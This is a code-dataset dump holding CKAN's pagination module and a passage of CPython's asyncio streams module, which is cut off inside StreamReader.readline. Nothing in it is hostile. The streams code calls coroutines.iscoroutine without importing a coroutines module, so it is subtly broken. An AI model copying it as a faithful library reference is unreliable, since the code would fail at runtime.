| 23.1 | 52 | 0.659091 |
795530cde74ebd9b1cb552c5d24590d84973a777 | 25,198 | py | Python | ckan/lib/pagination.py | JGulic/ckan | fe604ba20b63ce4802c108ce20e26e742b2905c8 | [
"Apache-2.0"
] | 1 | 2020-01-16T10:46:18.000Z | 2020-01-16T10:46:18.000Z | ckan/lib/pagination.py | JGulic/ckan | fe604ba20b63ce4802c108ce20e26e742b2905c8 | [
"Apache-2.0"
] | null | null | null | ckan/lib/pagination.py | JGulic/ckan | fe604ba20b63ce4802c108ce20e26e742b2905c8 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
u'''
This module was copied (with modifications) from the webhelpers library,
which is distributed with the following license:
Copyright (c) 2005-2009 Ben Bangert, James Gardner, Philip Jenvey,
Mike Orr, Jon Rosenbaugh, Christoph Haas,
and other contributors.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author or contributors may not be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
'''
import re
from string import Template
import dominate.tags as tags
from markupsafe import Markup
from six import text_type
from six.moves import range
class BasePage(list):
    """A list/iterator of items representing one page in a larger
    collection.

    An instance of the "Page" class is created from a collection of things.
    The instance works as an iterator running from the first item to the
    last item on the given page. The collection can be:

    - a sequence
    - an SQLAlchemy query - e.g.: Session.query(MyModel)
    - an SQLAlchemy select - e.g.: sqlalchemy.select([my_table])

    A "Page" instance maintains pagination logic associated with each
    page, where it begins, what the first/last item on the page is, etc.
    The pager() method creates a link list allowing the user to go to
    other pages.

    **WARNING:** Unless you pass in an item_count, a count will be
    performed on the collection every time a Page instance is created.
    If using an ORM, it's advised to pass in the number of items in the
    collection if that number is known.

    Instance attributes:

    original_collection -- the collection object being paged through
    item_count -- number of items in the collection
    page -- number of the current page (1-based)
    items_per_page -- maximal number of items displayed on a page
    first_page / last_page -- numbers of the first/last page (1-based)
    page_count -- number of pages
    items -- sequence of items on the current page
    first_item / last_item -- 1-based indices of the first/last item on
        the current page
    """

    def __init__(
        self,
        collection,
        page=1,
        items_per_page=20,
        item_count=None,
        sqlalchemy_session=None,
        presliced_list=False,
        url=None,
        **kwargs
    ):
        """Create a "Page" instance.

        Parameters:

        collection
            Sequence, SQLAlchemy select object or SQLAlchemy ORM-query
            representing the collection of items to page through.

        page
            The requested page number - starts with 1. Default: 1.

        items_per_page
            The maximal number of items to be displayed per page.
            Default: 20.

        item_count (optional)
            The total number of items in the collection - if known.
            If this parameter is not given then the paginator will count
            the number of elements in the collection every time a "Page"
            is created. Giving this parameter will speed up things.

        presliced_list (optional)
            Indicates whether the collection, when a list, has already
            been sliced for the current viewing page, and thus should
            *not* be sliced again.

        sqlalchemy_session (optional)
            If you want to use an SQLAlchemy (0.4) select object as a
            collection then you need to provide an SQLAlchemy session
            object. Select objects do not have a database connection
            attached so it would not be able to execute the SELECT query.

        url (optional)
            A URL generator function used by ``.pager()``; when omitted,
            ``_pagerlink`` falls back to CKAN's ``pager_url`` helper.

        Further keyword arguments are used as link arguments in the
        pager().
        """
        self._url_generator = url

        # Save the kwargs class-wide so they can be used in the pager()
        # method.
        self.kwargs = kwargs

        # Save a reference to the collection
        self.original_collection = collection

        self.collection = collection

        # The self.page is the number of the current page.
        # The first page has the number 1!
        try:
            self.page = int(page)  # make it int() if we get it as a string
        except (ValueError, TypeError):
            self.page = 1

        self.items_per_page = items_per_page

        # Unless the user tells us how many items the collections has
        # we calculate that ourselves.
        if item_count is not None:
            self.item_count = item_count
        else:
            self.item_count = len(self.collection)

        # Compute the number of the first and last available page
        if self.item_count > 0:
            self.first_page = 1
            self.page_count = int(
                ((self.item_count - 1) / self.items_per_page) + 1)
            self.last_page = self.first_page + self.page_count - 1

            # Make sure that the requested page number is in the range
            # of valid pages (clamp instead of raising).
            if self.page > self.last_page:
                self.page = self.last_page
            elif self.page < self.first_page:
                self.page = self.first_page

            # Note: the number of items on this page can be less than
            # items_per_page if the last page is not full
            self.first_item = (self.page - 1) * items_per_page + 1
            self.last_item = min(
                self.first_item + items_per_page - 1, self.item_count
            )

            # We subclassed "list" so we need to call its init() method
            # and fill the new list with the items to be displayed on the
            # page. We use list() so that the items on the current page
            # are retrieved only once. Otherwise it would run the actual
            # SQL query everytime .items would be accessed.
            if presliced_list:
                self.items = self.collection
            else:
                first = self.first_item - 1
                last = self.last_item
                self.items = list(self.collection[first:last])

            # Links to previous and next page
            if self.page > self.first_page:
                self.previous_page = self.page - 1
            else:
                self.previous_page = None

            if self.page < self.last_page:
                self.next_page = self.page + 1
            else:
                self.next_page = None

        # No items available
        else:
            self.first_page = None
            self.page_count = 0
            self.last_page = None
            self.first_item = None
            self.last_item = None
            self.previous_page = None
            self.next_page = None
            self.items = []

        # This is a subclass of the 'list' type. Initialise the list now.
        list.__init__(self, self.items)

    def __repr__(self):
        return (
            u"Page:\n"
            u"Collection type: %(type)s\n"
            u"(Current) page: %(page)s\n"
            u"First item: %(first_item)s\n"
            u"Last item: %(last_item)s\n"
            u"First page: %(first_page)s\n"
            u"Last page: %(last_page)s\n"
            u"Previous page: %(previous_page)s\n"
            u"Next page: %(next_page)s\n"
            u"Items per page: %(items_per_page)s\n"
            u"Number of items: %(item_count)s\n"
            u"Number of pages: %(page_count)s\n"
            % {
                u"type": type(self.collection),
                u"page": self.page,
                u"first_item": self.first_item,
                u"last_item": self.last_item,
                u"first_page": self.first_page,
                u"last_page": self.last_page,
                u"previous_page": self.previous_page,
                u"next_page": self.next_page,
                u"items_per_page": self.items_per_page,
                u"item_count": self.item_count,
                u"page_count": self.page_count,
            }
        )

    # NB: the default dicts below are shared across calls but are only
    # ever read (assigned to attributes / splatted into tags), never
    # mutated, so the mutable-default pitfall does not bite here.
    def pager(
        self,
        format=u"~2~",
        page_param=u"page",
        partial_param=u"partial",
        show_if_single_page=False,
        separator=u" ",
        onclick=None,
        symbol_first=u"<<",
        symbol_last=u">>",
        symbol_previous=u"<",
        symbol_next=u">",
        link_attr={u"class": u"pager_link"},
        curpage_attr={u"class": u"pager_curpage"},
        dotdot_attr={u"class": u"pager_dotdot"},
        **kwargs
    ):
        """Return string with links to other pages (e.g. "1 2 [3] 4 5 6 7").

        format
            Template for the pager, interpolated via string.Template.
            Available $-tokens: $first_page, $last_page, $page,
            $page_count, $items_per_page, $first_item, $last_item,
            $item_count, $link_first, $link_last, $link_previous,
            $link_next. A token like '~3~' renders a range of pages with
            that radius around the current page, e.g.
            '1 .. 5 6 7 [8] 9 10 11 .. 500'. Default: '~2~'.

        symbol_first / symbol_last / symbol_previous / symbol_next
            Link texts for the first/last/previous/next page links.
            Defaults: '<<', '>>', '<', '>'.

        separator
            String used to separate page links/numbers. Default: ' '.

        page_param
            Name of the URL parameter carrying the requested page number.
            Default: 'page'. If a URL generator callback is used it must
            accept this name as an argument.

        partial_param
            Name of the URL parameter set to 1 for partial (AJAX/AJAH)
            page requests triggered through 'onclick', so the server can
            distinguish partial from full page loads. Default: 'partial'.

        show_if_single_page
            If True the navigator is shown even if there is only one
            page. Default: False.

        link_attr / curpage_attr / dotdot_attr
            Attribute dicts applied to page links, to the current page
            number (wrapped in a SPAN when non-empty), and to the '..'
            spacer (wrapped in a SPAN when non-empty) respectively.

        onclick
            Optional Javascript used as the 'onclick' action of each
            pager link; '$partial_url' and '$page' are substituted
            ('%s' is also accepted for backward compatibility).

        Additional keyword arguments are used as arguments in the links.
        """
        self.curpage_attr = curpage_attr
        self.separator = separator
        self.pager_kwargs = kwargs
        self.page_param = page_param
        self.partial_param = partial_param
        self.onclick = onclick
        self.link_attr = link_attr
        self.dotdot_attr = dotdot_attr

        # Don't show navigator if there is no more than one page
        if self.page_count == 0 or (
            self.page_count == 1 and not show_if_single_page
        ):
            return u""

        # Replace ~...~ in token format by range of pages
        result = re.sub(u"~(\\d+)~", self._range, format)

        # Interpolate '$' variables
        result = Template(result).safe_substitute(
            {
                u"first_page": self.first_page,
                u"last_page": self.last_page,
                u"page": self.page,
                u"page_count": self.page_count,
                u"items_per_page": self.items_per_page,
                u"first_item": self.first_item,
                u"last_item": self.last_item,
                u"item_count": self.item_count,
                u"link_first": self.page > self.first_page
                and self._pagerlink(self.first_page, symbol_first)
                or u"",
                u"link_last": self.page < self.last_page
                and self._pagerlink(self.last_page, symbol_last)
                or u"",
                u"link_previous": self.previous_page
                and self._pagerlink(self.previous_page, symbol_previous)
                or u"",
                u"link_next": self.next_page
                and self._pagerlink(self.next_page, symbol_next)
                or u"",
            }
        )

        return Markup(result)

    # Private methods

    def _range(self, regexp_match):
        """
        Return range of linked pages (e.g. '1 2 [3] 4 5 6 7 8').

        Arguments:

        regexp_match
            A "re" (regular expressions) match object containing the
            radius of linked pages around the current page in
            regexp_match.group(1) as a string

        This function is supposed to be called as a callable in
        re.sub.
        """
        radius = int(regexp_match.group(1))

        # Compute the first and last page number within the radius
        # e.g. '1 .. 5 6 [7] 8 9 .. 12'
        # -> leftmost_page = 5
        # -> rightmost_page = 9
        leftmost_page = max(self.first_page, (self.page - radius))
        rightmost_page = min(self.last_page, (self.page + radius))

        nav_items = []

        # Create a link to the first page (unless we are on the first page
        # or there would be no need to insert '..' spacers)
        if self.page != self.first_page and self.first_page < leftmost_page:
            nav_items.append(self._pagerlink(self.first_page, self.first_page))

        # Insert dots if there are pages between the first page
        # and the currently displayed page range
        if leftmost_page - self.first_page > 1:
            # Wrap in a SPAN tag if dotdot_attr is set
            text = u".."
            if self.dotdot_attr:
                text = Markup(tags.span(text, **self.dotdot_attr))
            nav_items.append(text)

        for thispage in range(leftmost_page, rightmost_page + 1):
            # Hilight the current page number and do not use a link
            if thispage == self.page:
                text = u"%s" % (thispage,)
                # Wrap in a SPAN tag if curpage_attr is set
                if self.curpage_attr:
                    text = Markup(tags.span(text, **self.curpage_attr))
                nav_items.append(text)
            # Otherwise create just a link to that page
            else:
                text = u"%s" % (thispage,)
                nav_items.append(self._pagerlink(thispage, text))

        # Insert dots if there are pages between the displayed
        # page numbers and the end of the page range
        if self.last_page - rightmost_page > 1:
            text = u".."
            # Wrap in a SPAN tag if dotdot_attr is set
            if self.dotdot_attr:
                text = Markup(tags.span(text, **self.dotdot_attr))
            nav_items.append(text)

        # Create a link to the very last page (unless we are on the last
        # page or there would be no need to insert '..' spacers)
        if self.page != self.last_page and rightmost_page < self.last_page:
            nav_items.append(self._pagerlink(self.last_page, self.last_page))

        return self.separator.join(nav_items)

    def _pagerlink(self, page, text):
        """
        Create a URL that links to another page.

        Parameters:

        page
            Number of the page that the link points to

        text
            Text to be printed in the A-HREF tag
        """
        link_params = {}
        # Use the instance kwargs from Page.__init__ as URL parameters
        link_params.update(self.kwargs)
        # Add keyword arguments from pager() to the link as parameters
        link_params.update(self.pager_kwargs)
        link_params[self.page_param] = page

        # Get the URL generator
        if self._url_generator is not None:
            url_generator = self._url_generator
        else:
            from ckan.lib.helpers import pager_url
            # BUG FIX: the imported fallback was never bound to
            # url_generator, so reaching this branch raised NameError on
            # the call below whenever no 'url' callback was supplied.
            url_generator = pager_url

        # Create the URL to load a certain page
        link_url = url_generator(**link_params)

        if self.onclick:  # create link with onclick action for AJAX
            # Create the URL to load the page area part of a certain page
            # (AJAX updates)
            link_params[self.partial_param] = 1
            partial_url = url_generator(**link_params)
            try:
                # if '%s' is used in the 'onclick' parameter
                # (backwards compatibility)
                onclick_action = self.onclick % (partial_url,)
            except TypeError:
                onclick_action = Template(self.onclick).safe_substitute(
                    {u"partial_url": partial_url, u"page": page}
                )
            return tags.a(
                text, href=link_url, onclick=onclick_action, **self.link_attr
            )
        else:  # return static link
            return tags.a(text, href=link_url, **self.link_attr)
class Page(BasePage):
    """BasePage subclass that renders the pager with Bootstrap markup."""

    def pager(self, *args, **kwargs):
        # Wrap the rendered pager in Bootstrap pagination markup and use
        # laquo/raquo symbols; the actual work happens in BasePage.pager().
        with tags.div(cls=u"pagination-wrapper") as wrapper:
            tags.ul(u"$link_previous ~2~ $link_next", cls=u"pagination")
        kwargs.update(
            format=text_type(wrapper),
            symbol_previous=u"«",
            symbol_next=u"»",
            curpage_attr={u"class": u"active"},
            link_attr={},
        )
        return super(Page, self).pager(*args, **kwargs)

    # Put each page link into a <li> (for Bootstrap to style it)
    def _pagerlink(self, page, text, extra_attributes=None):
        anchor = super(Page, self)._pagerlink(page, text)
        extra_attributes = extra_attributes or {}
        return text_type(tags.li(anchor, **extra_attributes))

    # Change 'current page' link from <span> to <li><a>
    # and '..' into '<li><a>..'
    # (for Bootstrap to style them properly)
    def _range(self, regexp_match):
        html = super(Page, self)._range(regexp_match)

        # Convert .. spacer SPANs into disabled list items.
        dotdot = u'<span class="pager_dotdot">..</span>'
        dotdot_link = tags.li(tags.a(u"...", href=u"#"), cls=u"disabled")
        html = re.sub(dotdot, dotdot_link, html)

        # Convert current page SPAN into an active <li><a> entry.
        text = u"%s" % self.page
        current_page_span = text_type(tags.span(text, **self.curpage_attr))
        current_page_link = self._pagerlink(
            self.page, text, extra_attributes=self.curpage_attr
        )
        return re.sub(current_page_span, current_page_link, html)
| 38.063444 | 79 | 0.597111 |
795530e6f69efed66df8a91a383091f65e455a6a | 27,342 | py | Python | Lib/asyncio/streams.py | umoqnier/cpython | d8ca2354ed30c12b9ce37c4535222b700a727b32 | [
"CNRI-Python-GPL-Compatible"
] | 3 | 2020-09-23T14:09:49.000Z | 2021-06-23T07:48:04.000Z | Lib/asyncio/streams.py | umoqnier/cpython | d8ca2354ed30c12b9ce37c4535222b700a727b32 | [
"CNRI-Python-GPL-Compatible"
] | 2 | 2022-01-25T23:07:38.000Z | 2022-03-01T18:04:59.000Z | Lib/asyncio/streams.py | umoqnier/cpython | d8ca2354ed30c12b9ce37c4535222b700a727b32 | [
"CNRI-Python-GPL-Compatible"
] | 2 | 2019-11-16T02:03:51.000Z | 2019-11-16T02:10:57.000Z | __all__ = (
'StreamReader', 'StreamWriter', 'StreamReaderProtocol',
'open_connection', 'start_server')
import socket
import sys
import warnings
import weakref
if hasattr(socket, 'AF_UNIX'):
    # UNIX domain socket helpers only exist on platforms with AF_UNIX.
    __all__ += ('open_unix_connection', 'start_unix_server')
from . import events
from . import exceptions
from . import format_helpers
from . import protocols
from .log import logger
from .tasks import sleep
# Default buffer limit handed to StreamReader by the helpers below.
_DEFAULT_LIMIT = 2 ** 16  # 64 KiB
async def open_connection(host=None, port=None, *,
                          loop=None, limit=_DEFAULT_LIMIT, **kwds):
    """A wrapper for create_connection() returning a (reader, writer) pair.

    The reader returned is a StreamReader instance; the writer is a
    StreamWriter instance.

    The arguments are all the usual arguments to create_connection()
    except protocol_factory; most common are positional host and port,
    with various optional keyword arguments following.

    Additional optional keyword arguments are loop (to set the event loop
    instance to use) and limit (to set the buffer limit passed to the
    StreamReader).

    (If you want to customize the StreamReader and/or
    StreamReaderProtocol classes, just copy the code -- there's
    really nothing special here except some convenience.)
    """
    if loop is not None:
        # An explicitly supplied loop is deprecated but still honoured.
        warnings.warn("The loop argument is deprecated since Python 3.8, "
                      "and scheduled for removal in Python 3.10.",
                      DeprecationWarning, stacklevel=2)
    else:
        loop = events.get_event_loop()
    stream_reader = StreamReader(limit=limit, loop=loop)
    stream_protocol = StreamReaderProtocol(stream_reader, loop=loop)
    transport, _ = await loop.create_connection(
        lambda: stream_protocol, host, port, **kwds)
    stream_writer = StreamWriter(transport, stream_protocol,
                                 stream_reader, loop)
    return stream_reader, stream_writer
async def start_server(client_connected_cb, host=None, port=None, *,
                       loop=None, limit=_DEFAULT_LIMIT, **kwds):
    """Start a socket server, call back for each client connected.

    The first parameter, `client_connected_cb`, takes two parameters:
    client_reader, client_writer. client_reader is a StreamReader
    object, while client_writer is a StreamWriter object. This
    parameter can either be a plain callback function or a coroutine;
    if it is a coroutine, it will be automatically converted into a
    Task.

    The rest of the arguments are all the usual arguments to
    loop.create_server() except protocol_factory; most common are
    positional host and port, with various optional keyword arguments
    following.

    Additional optional keyword arguments are loop (to set the event loop
    instance to use) and limit (to set the buffer limit passed to the
    StreamReader).

    The return value is the same as loop.create_server(), i.e. a
    Server object which can be used to stop the service.
    """
    if loop is not None:
        # An explicitly supplied loop is deprecated but still honoured.
        warnings.warn("The loop argument is deprecated since Python 3.8, "
                      "and scheduled for removal in Python 3.10.",
                      DeprecationWarning, stacklevel=2)
    else:
        loop = events.get_event_loop()

    def protocol_factory():
        # One fresh reader/protocol pair per incoming connection.
        stream_reader = StreamReader(limit=limit, loop=loop)
        return StreamReaderProtocol(stream_reader, client_connected_cb,
                                    loop=loop)

    return await loop.create_server(protocol_factory, host, port, **kwds)
if hasattr(socket, 'AF_UNIX'):
    # UNIX Domain Sockets are supported on this platform

    async def open_unix_connection(path=None, *,
                                   loop=None, limit=_DEFAULT_LIMIT, **kwds):
        """Similar to `open_connection` but works with UNIX Domain Sockets."""
        if loop is not None:
            # An explicitly supplied loop is deprecated but still honoured.
            warnings.warn("The loop argument is deprecated since Python 3.8, "
                          "and scheduled for removal in Python 3.10.",
                          DeprecationWarning, stacklevel=2)
        else:
            loop = events.get_event_loop()
        stream_reader = StreamReader(limit=limit, loop=loop)
        stream_protocol = StreamReaderProtocol(stream_reader, loop=loop)
        transport, _ = await loop.create_unix_connection(
            lambda: stream_protocol, path, **kwds)
        stream_writer = StreamWriter(transport, stream_protocol,
                                     stream_reader, loop)
        return stream_reader, stream_writer

    async def start_unix_server(client_connected_cb, path=None, *,
                                loop=None, limit=_DEFAULT_LIMIT, **kwds):
        """Similar to `start_server` but works with UNIX Domain Sockets."""
        if loop is not None:
            # An explicitly supplied loop is deprecated but still honoured.
            warnings.warn("The loop argument is deprecated since Python 3.8, "
                          "and scheduled for removal in Python 3.10.",
                          DeprecationWarning, stacklevel=2)
        else:
            loop = events.get_event_loop()

        def protocol_factory():
            # One fresh reader/protocol pair per incoming connection.
            stream_reader = StreamReader(limit=limit, loop=loop)
            return StreamReaderProtocol(stream_reader, client_connected_cb,
                                        loop=loop)

        return await loop.create_unix_server(protocol_factory, path, **kwds)
class FlowControlMixin(protocols.Protocol):
    """Reusable flow control logic for StreamWriter.drain().

    This implements the protocol methods pause_writing(),
    resume_writing() and connection_lost(). If the subclass overrides
    these it must call the super methods.

    StreamWriter.drain() must wait for _drain_helper() coroutine.
    """

    def __init__(self, loop=None):
        if loop is None:
            self._loop = events.get_event_loop()
        else:
            self._loop = loop
        # True while the transport has asked us to stop writing.
        self._paused = False
        # Future a pending _drain_helper() is blocked on, or None.
        self._drain_waiter = None
        self._connection_lost = False

    def pause_writing(self):
        """Transport callback: buffer over high-water mark; block drain()."""
        assert not self._paused
        self._paused = True
        if self._loop.get_debug():
            logger.debug("%r pauses writing", self)

    def resume_writing(self):
        """Transport callback: buffer drained; wake the pending drain()."""
        assert self._paused
        self._paused = False
        if self._loop.get_debug():
            logger.debug("%r resumes writing", self)

        waiter = self._drain_waiter
        if waiter is not None:
            self._drain_waiter = None
            if not waiter.done():
                waiter.set_result(None)

    def connection_lost(self, exc):
        """Transport callback: unblock a paused drain() on disconnect."""
        self._connection_lost = True
        # Wake up the writer if currently paused.
        if not self._paused:
            return
        waiter = self._drain_waiter
        if waiter is None:
            return
        self._drain_waiter = None
        if waiter.done():
            return
        if exc is None:
            waiter.set_result(None)
        else:
            waiter.set_exception(exc)

    async def _drain_helper(self):
        # Fail fast if the connection is already gone.
        if self._connection_lost:
            raise ConnectionResetError('Connection lost')
        if not self._paused:
            return
        # Only one drain() may be pending at a time (unless the previous
        # waiter was cancelled).
        waiter = self._drain_waiter
        assert waiter is None or waiter.cancelled()
        waiter = self._loop.create_future()
        self._drain_waiter = waiter
        await waiter

    def _get_close_waiter(self, stream):
        # Subclasses must provide the future that completes on close.
        raise NotImplementedError
class StreamReaderProtocol(FlowControlMixin, protocols.Protocol):
    """Helper class to adapt between Protocol and StreamReader.

    (This is a helper class instead of making StreamReader itself a
    Protocol subclass, because the StreamReader has other potential
    uses, and to prevent the user of the StreamReader to accidentally
    call inappropriate methods of the protocol.)
    """

    _source_traceback = None

    def __init__(self, stream_reader, client_connected_cb=None, loop=None):
        super().__init__(loop=loop)
        if stream_reader is not None:
            # Hold the reader only weakly so that an abandoned stream
            # can be garbage collected; _on_reader_gc then aborts the
            # transport and warns the user.
            self._stream_reader_wr = weakref.ref(stream_reader,
                                                 self._on_reader_gc)
            self._source_traceback = stream_reader._source_traceback
        else:
            self._stream_reader_wr = None
        if client_connected_cb is not None:
            # This is a stream created by the `create_server()` function.
            # Keep a strong reference to the reader until a connection
            # is established.
            self._strong_reader = stream_reader
        self._reject_connection = False
        self._stream_writer = None
        self._transport = None
        self._client_connected_cb = client_connected_cb
        self._over_ssl = False
        self._closed = self._loop.create_future()

    def _on_reader_gc(self, wr):
        # Weakref callback: the user dropped the StreamReader without
        # closing the stream.
        transport = self._transport
        if transport is not None:
            # connection_made was called
            context = {
                'message': ('An open stream object is being garbage '
                            'collected; call "stream.close()" explicitly.')
            }
            if self._source_traceback:
                context['source_traceback'] = self._source_traceback
            self._loop.call_exception_handler(context)
            transport.abort()
        else:
            # No transport yet: refuse the connection once it arrives.
            self._reject_connection = True
        self._stream_reader_wr = None

    @property
    def _stream_reader(self):
        # Dereference the weakref; None once the reader was collected.
        if self._stream_reader_wr is None:
            return None
        return self._stream_reader_wr()

    def connection_made(self, transport):
        if self._reject_connection:
            context = {
                'message': ('An open stream was garbage collected prior to '
                            'establishing network connection; '
                            'call "stream.close()" explicitly.')
            }
            if self._source_traceback:
                context['source_traceback'] = self._source_traceback
            self._loop.call_exception_handler(context)
            transport.abort()
            return
        self._transport = transport
        reader = self._stream_reader
        if reader is not None:
            reader.set_transport(transport)
        self._over_ssl = transport.get_extra_info('sslcontext') is not None
        if self._client_connected_cb is not None:
            self._stream_writer = StreamWriter(transport, self,
                                               reader,
                                               self._loop)
            res = self._client_connected_cb(reader,
                                            self._stream_writer)
            if coroutines.iscoroutine(res):
                self._loop.create_task(res)
            # Connection established: drop the strong reference so only
            # the weakref keeps the reader alive from here on.
            self._strong_reader = None

    def connection_lost(self, exc):
        reader = self._stream_reader
        if reader is not None:
            if exc is None:
                reader.feed_eof()
            else:
                reader.set_exception(exc)
        if not self._closed.done():
            if exc is None:
                self._closed.set_result(None)
            else:
                self._closed.set_exception(exc)
        super().connection_lost(exc)
        self._stream_reader_wr = None
        self._stream_writer = None
        self._transport = None

    def data_received(self, data):
        reader = self._stream_reader
        if reader is not None:
            reader.feed_data(data)

    def eof_received(self):
        reader = self._stream_reader
        if reader is not None:
            reader.feed_eof()
        if self._over_ssl:
            # Prevent a warning in SSLProtocol.eof_received:
            # "returning true from eof_received()
            # has no effect when using ssl"
            return False
        return True

    def _get_close_waiter(self, stream):
        return self._closed

    def __del__(self):
        # Prevent reports about unhandled exceptions.
        # Better than self._closed._log_traceback = False hack
        closed = self._closed
        if closed.done() and not closed.cancelled():
            closed.exception()
class StreamWriter:
    """Transport wrapper providing the write side of a stream.

    Exposes write(), writelines(), [can_]write_eof(), get_extra_info()
    and close().  Adds drain(), which returns an optional Future on
    which you can wait for flow control, and a ``transport`` property
    referencing the wrapped transport directly.
    """

    def __init__(self, transport, protocol, reader, loop):
        self._transport = transport
        self._protocol = protocol
        # drain() expects that the reader has an exception() method
        assert reader is None or isinstance(reader, StreamReader)
        self._reader = reader
        self._loop = loop
        self._complete_fut = self._loop.create_future()
        self._complete_fut.set_result(None)

    def __repr__(self):
        parts = [self.__class__.__name__, f'transport={self._transport!r}']
        if self._reader is not None:
            parts.append(f'reader={self._reader!r}')
        return '<{}>'.format(' '.join(parts))

    @property
    def transport(self):
        """The wrapped transport object."""
        return self._transport

    def write(self, data):
        """Write *data* to the transport (non-blocking)."""
        self._transport.write(data)

    def writelines(self, data):
        """Write an iterable of byte chunks to the transport."""
        self._transport.writelines(data)

    def write_eof(self):
        return self._transport.write_eof()

    def can_write_eof(self):
        return self._transport.can_write_eof()

    def close(self):
        return self._transport.close()

    def is_closing(self):
        return self._transport.is_closing()

    async def wait_closed(self):
        """Wait until the underlying connection is fully closed."""
        await self._protocol._get_close_waiter(self)

    def get_extra_info(self, name, default=None):
        return self._transport.get_extra_info(name, default)

    async def drain(self):
        """Flush the write buffer.

        The intended use is to write

          w.write(data)
          await w.drain()
        """
        if self._reader is not None:
            exc = self._reader.exception()
            if exc is not None:
                raise exc
        if self._transport.is_closing():
            # Wait for protocol.connection_lost() call
            # Raise connection closing error if any,
            # ConnectionResetError otherwise
            # Yield to the event loop so connection_lost() may be
            # called.  Without this, _drain_helper() would return
            # immediately, and code that calls
            #     write(...); await drain()
            # in a loop would never call connection_lost(), so it
            # would not see an error when the socket is closed.
            await sleep(0)
        await self._protocol._drain_helper()
class StreamReader:
    """Buffered reader side of an asyncio stream.

    The protocol pushes bytes in via feed_data()/feed_eof(); user
    coroutines pull them out via read(), readline(), readuntil() and
    readexactly().  The transport is paused/resumed around the
    configured limit to provide flow control.
    """

    _source_traceback = None

    def __init__(self, limit=_DEFAULT_LIMIT, loop=None):
        # The line length limit is a security feature;
        # it also doubles as half the buffer limit.
        if limit <= 0:
            raise ValueError('Limit cannot be <= 0')
        self._limit = limit
        if loop is None:
            self._loop = events.get_event_loop()
        else:
            self._loop = loop
        self._buffer = bytearray()
        self._eof = False    # Whether we're done.
        self._waiter = None  # A future used by _wait_for_data()
        self._exception = None
        self._transport = None
        self._paused = False  # True while reading is paused (flow control)
        if self._loop.get_debug():
            self._source_traceback = format_helpers.extract_stack(
                sys._getframe(1))

    def __repr__(self):
        info = ['StreamReader']
        if self._buffer:
            info.append(f'{len(self._buffer)} bytes')
        if self._eof:
            info.append('eof')
        if self._limit != _DEFAULT_LIMIT:
            info.append(f'limit={self._limit}')
        if self._waiter:
            info.append(f'waiter={self._waiter!r}')
        if self._exception:
            info.append(f'exception={self._exception!r}')
        if self._transport:
            info.append(f'transport={self._transport!r}')
        if self._paused:
            info.append('paused')
        return '<{}>'.format(' '.join(info))

    def exception(self):
        return self._exception

    def set_exception(self, exc):
        # Record the failure and propagate it to any pending reader.
        self._exception = exc
        waiter = self._waiter
        if waiter is not None:
            self._waiter = None
            if not waiter.cancelled():
                waiter.set_exception(exc)

    def _wakeup_waiter(self):
        """Wakeup read*() functions waiting for data or EOF."""
        waiter = self._waiter
        if waiter is not None:
            self._waiter = None
            if not waiter.cancelled():
                waiter.set_result(None)

    def set_transport(self, transport):
        assert self._transport is None, 'Transport already set'
        self._transport = transport

    def _maybe_resume_transport(self):
        # Resume reading once the buffer has drained back to the limit.
        if self._paused and len(self._buffer) <= self._limit:
            self._paused = False
            self._transport.resume_reading()

    def feed_eof(self):
        self._eof = True
        self._wakeup_waiter()

    def at_eof(self):
        """Return True if the buffer is empty and 'feed_eof' was called."""
        return self._eof and not self._buffer

    def feed_data(self, data):
        assert not self._eof, 'feed_data after feed_eof'
        if not data:
            return
        self._buffer.extend(data)
        self._wakeup_waiter()
        # Flow control: pause reading once more than twice the limit is
        # buffered.
        if (self._transport is not None and
                not self._paused and
                len(self._buffer) > 2 * self._limit):
            try:
                self._transport.pause_reading()
            except NotImplementedError:
                # The transport can't be paused.
                # We'll just have to buffer all data.
                # Forget the transport so we don't keep trying.
                self._transport = None
            else:
                self._paused = True

    async def _wait_for_data(self, func_name):
        """Wait until feed_data() or feed_eof() is called.

        If stream was paused, automatically resume it.
        """
        # StreamReader uses a future to link the protocol feed_data() method
        # to a read coroutine. Running two read coroutines at the same time
        # would have an unexpected behaviour. It would not possible to know
        # which coroutine would get the next data.
        if self._waiter is not None:
            raise RuntimeError(
                f'{func_name}() called while another coroutine is '
                f'already waiting for incoming data')
        assert not self._eof, '_wait_for_data after EOF'
        # Waiting for data while paused will make deadlock, so prevent it.
        # This is essential for readexactly(n) for case when n > self._limit.
        if self._paused:
            self._paused = False
            self._transport.resume_reading()
        self._waiter = self._loop.create_future()
        try:
            await self._waiter
        finally:
            self._waiter = None

    async def readline(self):
        """Read chunk of data from the stream until newline (b'\n') is found.

        On success, return chunk that ends with newline. If only partial
        line can be read due to EOF, return incomplete line without
        terminating newline. When EOF was reached while no bytes read, empty
        bytes object is returned.

        If limit is reached, ValueError will be raised. In that case, if
        newline was found, complete line including newline will be removed
        from internal buffer. Else, internal buffer will be cleared. Limit is
        compared against part of the line without newline.

        If stream was paused, this function will automatically resume it if
        needed.
        """
        sep = b'\n'
        seplen = len(sep)
        try:
            line = await self.readuntil(sep)
        except exceptions.IncompleteReadError as e:
            return e.partial
        except exceptions.LimitOverrunError as e:
            # Consume the over-long line (including separator) or, when
